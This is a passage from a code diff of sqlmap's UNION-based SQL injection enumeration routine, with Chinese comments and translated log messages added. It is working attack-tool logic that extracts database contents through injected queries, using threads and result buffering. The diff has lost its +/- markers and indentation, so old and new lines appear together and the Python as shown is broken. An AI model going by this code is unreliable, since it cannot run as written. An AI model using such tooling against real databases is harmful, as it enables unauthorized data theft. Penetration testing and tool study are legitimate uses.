# 处理返回列数不匹配的情况
if len(items) > 1 and len(expressionFieldsList) > 1:
items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)]
items = [_ for _ in flattenValue(items)]
@ -404,12 +450,14 @@ def unionUse(expression, unpack=True, dump=False):
items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter)
# 处理缓冲区
while threadData.shared.buffered and (threadData.shared.lastFlushed + 1 >= threadData.shared.buffered[0][0] or len(threadData.shared.buffered) > MAX_BUFFERED_PARTIAL_UNION_LENGTH):
threadData.shared.lastFlushed, _ = threadData.shared.buffered[0]
if not isNoneValue(_):
del threadData.shared.buffered[0]
# 显示查询进度
if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta and not kb.bruteMode:
_ = ','.join("'%s'" % _ for _ in (flattenValue(arrayizeValue(items)) if not isinstance(items, six.string_types) else [items]))
status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", _ if kb.safeCharEncode else safecharencode(_))
@ -419,6 +467,7 @@ def unionUse(expression, unpack=True, dump=False):
dataToStdout("%s\n" % status)
# 运行多线程查询
runThreads(numThreads, unionThread)
if conf.verbose == 1:
@ -427,25 +476,28 @@ def unionUse(expression, unpack=True, dump=False):
except KeyboardInterrupt:
abortedFlag = True
warnMsg = "user aborted during enumeration. sqlmap "
warnMsg += "will display partial output"
warnMsg = "用户中止枚举。sqlmap "
warnMsg += "将显示部分输出"
# 整理最终结果
for _ in sorted(threadData.shared.buffered):
if not isNoneValue(_[1]):
value = threadData.shared.value
kb.suppressResumeInfo = False
# 如果没有使用分页查询且未中止,执行单次查询
if not value and not abortedFlag:
output = _oneShotUnionUse(expression, unpack)
value = parseUnionPage(output)
# 计算查询耗时
duration = calculateDeltaSeconds(start)
if not kb.bruteMode:
debugMsg = "performed %d quer%s in %.2f seconds" % (kb.counters[PAYLOAD.TECHNIQUE.UNION], 'y' if kb.counters[PAYLOAD.TECHNIQUE.UNION] == 1 else "ies", duration)
debugMsg = "执行了 %d 次查询,耗时 %.2f" % (kb.counters[PAYLOAD.TECHNIQUE.UNION], duration)
return value
